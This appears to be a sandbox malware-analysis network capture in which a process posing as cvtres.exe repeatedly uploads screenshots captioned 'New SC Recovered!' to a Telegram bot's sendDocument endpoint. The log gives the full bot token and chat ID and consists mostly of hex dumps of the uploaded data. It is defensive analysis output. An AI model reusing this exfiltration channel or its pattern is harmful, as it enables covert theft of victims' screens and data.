                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:38 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:38 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:38 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 30 32 61 62 61 39 32 30 34 38 34 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd302aba920484--
                                                        2024-10-30 15:25:38 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:38 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.450015149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:43 UTC238OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd359e03a55a94
                                                        Host: api.telegram.org
                                                        Content-Length: 81440
                                                        Expect: 100-continue
                                                        2024-10-30 15:25:43 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:43 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 39 65 30 33 61 35 35 61 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 39 65 30 33 61 35 35 61 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 35 2f 32 30 32 35 20 31 39 3a 32 31 3a 33 34 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd359e03a55a94Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd359e03a55a94Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/15/2025 19:21:34User
                                                        2024-10-30 15:25:43 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:43 UTC16355OUTData Raw: 95 bd 08 c2 8c 76 ce 0f 4c 54 90 1f b6 6a 17 b1 19 33 69 6e d1 ca 99 3f 79 21 f9 58 0f aa 92 69 c2 ca dc 46 63 d9 c1 eb 43 59 5b b4 42 32 83 68 e9 5c bf 52 97 f3 7f c3 9d 9f da 30 fe 5f f8 61 b1 5c cf 34 ba 3d f3 39 32 6a 77 96 e6 45 fe ef 94 76 be 7e ac 54 fe 15 0b dc 5b be 95 ab 08 6d ee e2 71 6c c7 74 b3 ab 8f f5 a9 d8 22 ff 00 3a 9f ec 16 df f3 cc 51 25 8d bc 91 08 d9 32 a3 a0 a4 b0 52 57 d7 fa d0 a7 98 c1 b4 f9 76 65 ab e2 d3 f8 9a 07 b4 2d f6 7b 7d 45 16 e2 20 39 59 0b fd f6 f5 52 30 01 ed 8c 7b 98 ac 35 12 35 2b 3d 48 48 3c db 9b a8 ed 76 03 ca c9 b8 09 1b 1e 85 31 f8 c9 ed 50 1d 32 d0 a0 4f 2f 81 49 fd 9b 6b ff 00 3c c5 25 82 9a 49 73 0d e6 14 9e f1 16 c7 cd 5b 36 96 48 d8 a9 0f 2e ec 8f b8 1f 69 3d 7d 78 ab 6e ac 92 bc 4e a5 5e 33 b5 81 ec 7f 0a
                                                        Data Ascii: vLTj3in?y!XiFcCY[B2h\R0_a\4=92jwEv~T[mqlt":Q%2RWve-{}E 9YR0{55+=HH<v1P2O/Ik<%Is[6H.i=}xnN^3
                                                        2024-10-30 15:25:43 UTC16355OUTData Raw: 80 4b 35 d4 77 6e 30 71 bd 09 20 0e 7a 72 6b ce b5 78 d9 af 9f e0 7b 17 c2 cd 35 2b 5b a1 a0 9e 54 ad b7 ed 56 c0 34 be 4c 6c 5d b1 23 8c 65 47 cb db 20 64 e0 73 d6 99 05 bc 32 08 9c 3d ba 4b 2a bb 24 6f 21 0c 42 12 1b b6 06 36 9e a7 e9 54 ad 6d 66 b5 8d 57 ec f6 d3 6c 98 cf 19 90 1f dd 39 c6 48 c1 19 e8 38 39 1c 0e 2a 38 6c af 23 6b 67 3e 5b b5 bc 52 c4 a5 b3 c8 93 76 e2 79 e4 fc e7 f4 a6 e5 89 ed fd 5b fc c4 a3 82 ee cd 78 23 6b 99 91 2d 9d 27 57 84 ce 24 88 3b 0d a1 b6 9e 02 ee ce 78 c6 29 24 56 8e 79 21 91 76 bc 67 07 82 3a 8c 8e a0 1f ce b2 ad ec ee a0 8e 28 0c 70 4b 6e 90 35 bb 44 e0 e2 45 2e 5f 9c 10 72 1b 90 41 1d 2a fd bc 49 0a 91 1c 2b 0a 9c 7c 88 49 03 e9 92 4f eb 5b 52 95 67 2f 7f 63 9b 11 1c 32 87 ee 9e a4 b4 51 45 75 1c 01 45 14 50 30 a2 8a
                                                        Data Ascii: K5wn0q zrkx{5+[TV4Ll]#eG ds2=K*$o!B6TmfWl9H89*8l#kg>[Rvy[x#k-'W$;x)$Vy!vg:(pKn5DE._rA*I+|IO[Rg/c2QEuEP0
                                                        2024-10-30 15:25:43 UTC15447OUTData Raw: a9 90 d4 7a 84 4f 3e 9f 2c 71 8c b1 03 03 d7 04 1a f3 30 b2 51 af 06 f6 ba fc cf 43 15 17 2a 13 4b 7b 3f c8 e5 a8 a2 8a fb e3 e0 82 8a 28 a0 02 8a 28 a0 0e ec d5 36 3f bd 7f f7 8d 5b 26 a9 31 fd f3 ff 00 bc 6b f3 fa 9b 1f a1 c4 95 4d 72 97 bf f1 fd 71 ff 00 5d 1b f9 d7 54 95 cc ea 50 bc 37 d2 ef 18 de c5 c7 b8 26 bd 8c 8e 49 55 92 f2 3c 3c f2 2d d2 8b f3 2a 51 4b 45 7d 41 f2 e2 51 4b 49 40 c2 ba 5f 09 7f ab ba fa af f5 ae 6a ba 4f 09 7f ab ba fa af f5 ae 3c 6f f0 8f 47 2c ff 00 78 f9 32 dd 8d ac 0f a4 db 5c dc 4f 73 96 81 64 91 cd dc a0 7d d0 49 fb d5 65 2c 2d 64 8d 5d 26 b9 65 61 90 45 dc b8 23 fe fa ae 33 57 d6 cc da 55 9e 9b 6c df bb 48 23 12 b0 fe 22 14 7c bf 87 f3 a9 7c 3f ad dc 45 65 36 9c 1c 79 85 09 b6 66 ec df dd fc 7b 7b d7 34 b0 f5 39 5c ef d7
                                                        Data Ascii: zO>,q0QC*K{?((6?[&1kMrq]TP7&IU<<-*QKE}AQKI@_jO<oG,x2\Osd}Ie,-d]&eaE#3WUlH#"||?Ee6yf{{49\
                                                        2024-10-30 15:25:43 UTC15854OUTData Raw: 2a 8b 96 6c ea c3 c7 11 46 5c f4 d7 4f cc e8 3f e1 2b 6f f9 f1 1f f7 fb ff 00 b1 a3 fe 12 b6 ff 00 9f 11 ff 00 7f bf fb 1a e6 3c ec c5 23 81 96 8d 82 b2 0f bd c9 c7 4f ae 07 e2 2a 78 56 39 ae 4d ba de 5b 09 43 94 c1 2f d4 75 39 08 46 07 3c e7 b5 60 e8 61 d7 53 a9 62 b1 8f a1 d0 7f c2 56 df f3 e2 3f ef f7 ff 00 63 59 3a ad f9 d4 ae 96 73 17 95 84 09 b7 76 ee 84 9f 41 eb 54 12 44 79 21 55 96 36 59 90 c8 ae 09 db b4 13 93 c8 cf 1b 4f 6a 41 34 7e 42 ca f3 43 11 74 de 91 c8 c7 73 2f 63 c0 20 67 b6 48 fc aa e1 4e 85 39 29 45 99 d5 ab 8b ab 17 4e 6b 42 4a 29 8e e8 96 fe 60 9a 17 71 12 4c d0 a9 6d ea 8f 8c 1e 40 1d c7 42 7a d2 c8 f1 a4 c6 11 34 52 48 ad b2 44 42 73 1b 7a 1c 80 0f e0 48 ae 95 5a 0d d9 33 8a 58 6a b1 57 71 d0 75 15 1c 92 88 e1 96 52 46 d8 99 55 b9
                                                        Data Ascii: *lF\O?+o<#O*xV9M[C/u9F<`aSbV?cY:svATDy!U6YOjA4~BCts/c gHN9)ENkBJ)`qLm@Bz4RHDBszHZ3XjWquRFU
                                                        2024-10-30 15:25:43 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 39 65 30 33 61 35 35 61 39 34 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd359e03a55a94--
                                                        2024-10-30 15:25:44 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:44 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.450016149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:45 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd3801e7ebb72f
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:45 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:45 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 30 31 65 37 65 62 62 37 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 30 31 65 37 65 62 62 37 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 38 2f 32 30 32 35 20 32 30 3a 34 31 3a 33 39 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd3801e7ebb72fContent-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd3801e7ebb72fContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/18/2025 20:41:39User
                                                        2024-10-30 15:25:45 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:45 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:45 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:45 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:45 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:45 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 30 31 65 37 65 62 62 37 32 66 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd3801e7ebb72f--
                                                        2024-10-30 15:25:46 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:46 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.450017149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:52 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd3c0ce1646b7b
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:52 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:52 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 30 63 65 31 36 34 36 62 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 30 63 65 31 36 34 36 62 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 34 2f 32 30 32 35 20 30 30 3a 31 30 3a 30 38 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd3c0ce1646b7bContent-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd3c0ce1646b7bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/24/2025 00:10:08User
